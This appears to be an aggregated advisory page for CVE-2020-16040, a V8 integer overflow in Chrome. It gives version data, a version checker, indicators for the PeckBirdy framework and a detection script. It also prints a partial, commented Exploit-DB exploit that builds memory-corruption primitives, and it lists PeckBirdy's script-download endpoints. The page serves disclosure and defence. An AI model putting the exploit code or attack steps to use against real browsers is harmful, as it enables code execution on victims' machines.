CVE-2020-16040
Published: 2021-01-08
Priority: P2 · 79 · Medium · CVSS 3.1 base score 6.5
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
Exploitation: in the wild (ITW) · public exploit · VulnCheck KEV
EPSS: 99.59% (99.9th percentile)
Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Affected
8 ranges listed by the sources (identical rows collapsed):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chromium | chromium | >= 0 < 87.0.4280.88-0.1 | 87.0.4280.88-0.1 |
| debian | chromium | < 87.0.4280.88-0.1 (bookworm) | 87.0.4280.88-0.1 (bookworm) |
| google | chrome | < 87.0.4280.88 | 87.0.4280.88 |
| google | chrome | >= unspecified < 87.0.4280.88 | 87.0.4280.88 |
| google | chrome_chrome | — | — |
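As an added check (not code from any of the sources on this page): a small JavaScript helper that decides whether a Chrome or Chromium version string falls inside the affected range above, i.e. anything older than 87.0.4280.88. It accepts the forms a practitioner actually gets back: `chrome --version` output, a bare version, or a Debian package version with epoch and revision. The sample inputs at the bottom are constructed.

```javascript
// Added example, not from the page's sources: is this Chrome/Chromium build inside the
// affected range for CVE-2020-16040?  FIXED_IN is the first fixed version from the table above.
const FIXED_IN = "87.0.4280.88";

// Pull the first dotted numeric version out of a string. Debian's "1:87.0.4280.88-0.1" yields
// [87, 0, 4280, 88]: the epoch "1:" has no dot and is skipped, the "-0.1" revision is left behind.
function parseVersion(s) {
  const m = String(s).match(/(\d+(?:\.\d+)+)/);
  if (!m) throw new Error("no dotted version in: " + s);
  return m[1].split(".").map(Number);
}

// Numeric, component-wise comparison (so 4280 > 999); missing trailing components count as 0.
function compareVersions(a, b) {
  const n = Math.max(a.length, b.length);
  for (let i = 0; i < n; i++) {
    const d = (a[i] || 0) - (b[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}

// True when the build is strictly older than the fixed release.
function isAffected(versionString) {
  return compareVersions(parseVersion(versionString), parseVersion(FIXED_IN)) < 0;
}

// Constructed inputs covering the three input shapes.
for (const v of ["Google Chrome 86.0.4240.198", "87.0.4280.66", "1:87.0.4280.88-0.1", "Chromium 88.0.4324.96"]) {
  console.log(v, "->", isAffected(v) ? "AFFECTED" : "fixed");
}
```

The comparison is numeric rather than string-based on purpose: "87.0.4280.88" sorts before "87.0.999.0" as text but is the newer build.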
Detection & IOCs (extracted from sources)
- CVE-2020-16040 exploitation script delivered via the PeckBirdy C&C framework targeting Google Chrome; look for watering-hole injections on gambling and government websites that load remote JScript payloads.
- CVE-2020-16040 is an integer overflow in V8's SimplifiedLowering (TurboFan) phase; the public exploit uses Array.prototype.shift to obtain a JSArray with length -1, builds arbitrary read/write through an ArrayBuffer, and executes shellcode from a WebAssembly RWX page.
- PeckBirdy victim tracking: monitor for creation of a file named ___unique_id___ in the Windows %TEMP% folder, used to persist the victim ID across executions.
- PeckBirdy stores victim IDs in browser cookies under the prefix Hm_lvt_ (mimicking a legitimate analytics service); flag Hm_lvt_ cookies set by domains that are not the analytics provider.
- PeckBirdy serves fake Chrome update pages as social engineering; monitor for browser processes spawning unexpected child processes (in particular script hosts such as mshta.exe and wscript.exe, which its landing scripts target) after visits to gambling or government sites.
- The public Exploit-DB/Metasploit exploit runs its payload inside the renderer and therefore only works when Chrome is launched with --no-sandbox; a real in-the-wild chain needs a separate sandbox escape, but alerting on Chrome launched with --no-sandbox in enterprise environments is still worthwhile.
- CVE-2020-16040 affects Google Chrome versions prior to 87.0.4280.88; the public exploit targets 64-bit builds and is only reliably weaponized against that version range.
- PeckBirdy falls back to Adobe Flash ActiveX TCP socket communication for older environments; this path only matters on legacy systems where Flash was not removed.
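The host-side indicators above, turned into a small detector and run over Sysmon-style events. This is an added example, not code from Trend Micro, VulnCheck or any other source on this page. The event schema (EventType, Image, ParentImage, CommandLine, TargetFilename, Name, Domain), the browser and script-host names and every sample event are constructed for illustration; ANALYTICS_ALLOWLIST is an assumed placeholder that must hold the domains which legitimately set Hm_lvt_ cookies in your environment.

```javascript
// Added example (not from the page's sources): PeckBirdy / CVE-2020-16040 indicator matching
// over constructed Sysmon-style events.  Field names and sample data are assumptions.
const BROWSERS = new Set(["chrome.exe", "msedge.exe", "chromium.exe"]);
const LOLBINS = new Set(["mshta.exe", "wscript.exe", "cscript.exe"]); // script hosts named in the IOCs
const ANALYTICS_ALLOWLIST = new Set(["analytics.example.com"]);       // assumption: tune per environment

// Last path component, lower-cased, for either slash style.
function basename(p) {
  return String(p).split(/[\\/]/).pop().toLowerCase();
}

// ProcessCreate: a browser launched with --no-sandbox (what the public PoC needs), or a browser
// spawning one of the script hosts PeckBirdy's landing scripts are written for.
function checkProcess(ev) {
  const findings = [];
  const image = basename(ev.Image);
  if (BROWSERS.has(image) && /(^|\s)--no-sandbox(\s|$)/i.test(ev.CommandLine || "")) {
    findings.push({ rule: "chrome-no-sandbox", pid: ev.ProcessId });
  }
  if (LOLBINS.has(image) && ev.ParentImage && BROWSERS.has(basename(ev.ParentImage))) {
    findings.push({ rule: "browser-spawned-lolbin", pid: ev.ProcessId, child: image });
  }
  return findings;
}

// FileCreate: the ___unique_id___ victim-ID marker written directly under a Temp folder.
function checkFile(ev) {
  const path = String(ev.TargetFilename).replace(/\//g, "\\");
  const parent = path.slice(0, path.lastIndexOf("\\"));
  if (basename(path) === "___unique_id___" && /\\temp$/i.test(parent)) {
    return [{ rule: "peckbirdy-victim-id-file", path }];
  }
  return [];
}

// Cookie: an Hm_lvt_ cookie set by a domain that is not a known analytics host.
function checkCookie(ev) {
  const domain = String(ev.Domain).toLowerCase().replace(/^\./, "");
  if (String(ev.Name).startsWith("Hm_lvt_") && !ANALYTICS_ALLOWLIST.has(domain)) {
    return [{ rule: "hm_lvt-cookie-unexpected-domain", domain }];
  }
  return [];
}

// Dispatch each event to the matching rule set and collect findings in event order.
function scan(events) {
  const findings = [];
  for (const ev of events) {
    if (ev.EventType === "ProcessCreate") findings.push(...checkProcess(ev));
    else if (ev.EventType === "FileCreate") findings.push(...checkFile(ev));
    else if (ev.EventType === "Cookie") findings.push(...checkCookie(ev));
  }
  return findings;
}

// Constructed sample telemetry: four of the seven events should fire, three are benign noise.
const SAMPLE_EVENTS = [
  { EventType: "ProcessCreate", ProcessId: 4120, Image: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    ParentImage: "C:\\Windows\\explorer.exe", CommandLine: "\"chrome.exe\" --no-sandbox https://example.test/" },
  { EventType: "ProcessCreate", ProcessId: 4188, Image: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    ParentImage: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", CommandLine: "chrome.exe --type=renderer" },
  { EventType: "ProcessCreate", ProcessId: 5012, Image: "C:\\Windows\\System32\\mshta.exe",
    ParentImage: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", CommandLine: "mshta.exe https://example.test/abc/hta" },
  { EventType: "FileCreate", TargetFilename: "C:\\Users\\alice\\AppData\\Local\\Temp\\___unique_id___" },
  { EventType: "FileCreate", TargetFilename: "C:\\Users\\alice\\AppData\\Local\\Temp\\setup.tmp" },
  { EventType: "Cookie", Name: "Hm_lvt_1a2b3c", Domain: ".analytics.example.com" },
  { EventType: "Cookie", Name: "Hm_lvt_1a2b3c", Domain: "casino.example.test" },
];

console.log(JSON.stringify(scan(SAMPLE_EVENTS), null, 2));
```

The --no-sandbox match is anchored on whitespace so that unrelated switches sharing the prefix do not fire; the cookie rule is deliberately an allowlist, since the prefix itself is legitimate and only the setting domain separates PeckBirdy from the analytics service it imitates.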
CVSS provenance
| Source | CVSS | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 6.5 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H |
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:N/A:P |
| osv | | 6.5 | MEDIUM | |
| vulncheck | | 6.5 | MEDIUM | |
| vendor_debian | | 6.5 | MEDIUM | |
The NVD vectors record availability impact only (C:N/I:N/A:H and A:P), taking the "heap corruption" wording at face value, while Chrome's own advisory rates the bug High and the Metasploit and Exploit-DB modules reach code execution in the renderer. Treat the 6.5 as a bookkeeping score, not as a measure of the bug's real impact.
Chrome
Stable Channel Update for Desktop: CVE-2020-16040
vendor_chrome · 2020-12-02 · CVSS 6.5 · Severity: high
Excerpt from the Chrome 87.0.4280.88 release notes (bug 1150649 is the tracker ID the references below link for this CVE):
- [$TBD][1150649] High CVE-2020-16040: Insufficient data validation in V8. Reported by Lucas Pinheiro, Microsoft Browser Vulnerability Research on 2020-11-19
- [$TBD][1151865] Medium CVE-2020-16041: Out of bounds read in networking. Reported by Sergei Glazunov and Mark Brand of Google Project Zero on 2020-11-23
- [$TBD][1151890] Medium CVE-2020-16042: Uninitialized Use in V8
Debian
CVE-2020-16040: chromium - Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
vendor_debian · 2020 · CVSS 6.5 · [MEDIUM]
Scope: local
Status per suite (all resolved, fixed in 87.0.4280.88-0.1): bookworm, bullseye, forky, sid, trixie
GHSA
GHSA-6v42-384q-wwf5: Insufficient data validation in V8 in Google Chrome prior to 87
ghsa_unreviewed · 2022-05-24 · [MEDIUM] · CWE-787
Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
OSV
CVE-2020-16040: Insufficient data validation in V8 in Google Chrome prior to 87
osv · 2021-01-08 · CVSS 6.5 · [MEDIUM]
Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
VulnCheck
Google Chrome Improper Input Validation
vulncheck · 2020 · CVSS 6.5 · [MEDIUM]
Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Affected: Google Chrome
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.trendmicro.com/en_us/research/26/a/peckbirdy-script-framework.html
Exploit PoC: https://vulncheck.com/xdb/6d063e87a639
Project Zero
Project Zero RCA: CVE-2021-0920: Android sk_buff use-after-free in Linux
project_zero · CVSS 6.4 · [MEDIUM]
(This source entry concerns a different CVE, a Linux kernel use-after-free, and is unrelated to CVE-2020-16040.)
# CVE-2021-0920: Android sk_buff use-after-free in Linux
*Xingyu Jin, Android Security Research*
## The Basics
**Disclosure or Patch Date:** November 5, 2021
**Product:**Google Android
**Advisory:** https://source.android.com/security/bulletin/2021-11-01#kernel-components
**Affected Versions:** Pre-Nov 5 2021 SPL for devices released prior to Nov 2022
**First Patched Version:** 5 Nov 2021 SPL+
**Issue/Bug Report:** A-196926917
**Patch CL:** https://android.googlesource.com/kernel/common/+/cbcf01128d0a92e131bd09f1688fe032480b65ca
**Bug-Introducing CL:** Unknown
**Reporter(s):** Anonymous
## The Code
**Proof-of-concept:** See the appendix
**Exploit sample:** N/A
**Did you have access to the exploit sample when doing the analysis?** Yes
## The Vulnerability
**Bug class:** use-
No detection rules found.
Exploit-DB
Google Chrome 86.0.4240 V8 - Remote Code Execution
exploitdb · 2021-04-06 · CVSS 6.5 · [MEDIUM]
---
```javascript
// Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution
// Exploit Author: r4j0x00
// Version:

// 64-bit <-> double reinterpretation through one shared 8-byte buffer. Only the tail of
// itof() survived on this page; both helpers are written out in the standard form that
// tail implies (a Float64Array and a Uint32Array over the same buffer).
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) {            // double -> BigInt of its raw bits
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {            // BigInt -> double carrying those raw bits
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// Trigger. The arithmetic on y/z is arranged so that, once TurboFan has optimised foo(),
// the SimplifiedLowering phase's range for 0 - Math.sign(z) no longer matches the value
// actually produced (the integer overflow the advisory refers to). `a == NaN` is always
// false and is there only to shape the type feedback TurboFan sees. Array.prototype.shift
// on the array built from that length is the type-hardening bypass that leaves `arr`
// with length -1, so it can index far past its own storage.
function foo(a) {
    var y = 0x7fffffff;
    if (a == NaN) y = NaN;
    if (a) y = -1;
    let z = y + 1;
    z >>= 31;
    z = 0x80000000 - Math.sign(z|1);
    if(a) z = 0;
    var arr = new Array(0-Math.sign(z));
    arr.shift();
    var cor = [1.1, 1.2, 1.3];      // float array allocated next to arr's storage
    return [arr, cor];
}

// Warm up with a == true so foo() gets JIT-compiled, then run the miscompiled path once.
for(var i=0;i<0x3000;++i)
    foo(true);
var x = foo(false);
var arr = x[0];
var cor = x[1];

// With length -1, arr[idx+k] reaches into the neighbouring heap objects; the hard-coded
// idx encodes the heap layout of this Chrome build. arr[idx+1] and cor[0] alias one slot,
// which is what turns a write in one array and a read in the other into addrof/fakeobj.
const idx = 6;
arr[idx+10] = 0x4242;
function addrof(k) {
    arr[idx+1] = k;
    return ftoi(cor[0]) & 0xffffffffn;   // low 32 bits: the compressed pointer
}
function fakeobj(k) {
    cor[0] = itof(k);
    return arr[idx+1];
}
// cor[3] lies past cor's three elements and lands on a float-array map, which the exploit
// reuses to forge a float array (arr2) whose fields it controls.
var float_array_map = ftoi(cor[3]);
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
// (the listing is cut off here in the source)
```
Metasploit
Google Chrome versions before 87.0.4280.88 integer overflow during SimplifiedLowering phase
metasploit
This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit). The exploit makes use of an integer overflow in the SimplifiedLowering phase in TurboFan. It is used along with a type hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1. This is abused to gain arbitrary read/write into the isolate region. Then an ArrayBuffer can be used to achieve absolute arbitrary read/write. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process; the browser must be run with the --no-sandbox option for the payload to work correctly.
Trendmicro
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups
blogs_trendmicro · 2026-01-26 · CVSS 6.5 · [MEDIUM]
APT & Targeted Attacks
By: Ted Lee, Joseph C Chen, 2026/01/26
PeckBirdy is a sophisticated JScript-based C&C framework used by China-aligned APT groups to exploit LOLBins across multiple environments, delivering advanced backdoors to target gambling industries and Asian government entities.
# Key takeaways
- PeckBirdy is a JScript-based command-and-control (C&C) framework used by China-aligned APT actors since 2023, designed to execute across multiple environments, enabling flexible deployment.
- Two modular backdoors, HOLODONUT and MKDOOR, extend PeckBirdy's attack capabilities beyond its core functionality.
- Meanwhile, the SHADOW-VOID-044 and SHA
Trendmicro
PeckBirdy: A Versatile Script Framework for LOLBins Exploitation Used by China-aligned Threat Groups (continued excerpt)
blogs_trendmicro · 2026-01-26
Table 1. The PeckBirdy server APIs to obtain landing scripts
| Endpoint | Purpose |
|---|---|
| https://{domain}/{ATTACK_ID} | Downloads the main PeckBirdy script |
| https://{domain}/{ATTACK_ID}/hta | Downloads the landing script for MSHTA |
| https://{domain}/{ATTACK_ID}/html | Downloads the landing script for MTML |
| https://{domain}/{ATTACK_ID}/wscript | Downloads the landing script for WScript |
Dependi
HackerOne
Steam Deck Single Click Root Remote Code Execution
hackerone · 2023-08-01 · CVSS 6.5 · [MEDIUM]
The version of Chromium Embedded Framework included in the Linux client was susceptible to a v8 exploit that allowed modification of local files. The researcher demonstrated chaining local file modification to a local privilege escalation.
The Steam Deck on latest software is vulnerable to a Remote Code Execution (RCE) vulnerability which can be chained with a privilege escalation vulnerability to provide an attacker full arbitrary root execution access after a user clicks on a link to a maliciously crafted webpage in a Steam Chat message. The entire exploit chain can run deterministically after that single click with no further user interaction.
Specifically, the Chromium Embedded Framework (CEF) used in the steamwebhelper is based on C
References
- http://packetstormsecurity.com/files/162087/Google-Chrome-86.0.4240-V8-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/162106/Google-Chrome-86.0.4240-V8-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/162144/Google-Chrome-SimplfiedLowering-Integer-Overflow.html
- https://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.html
- https://crbug.com/1150649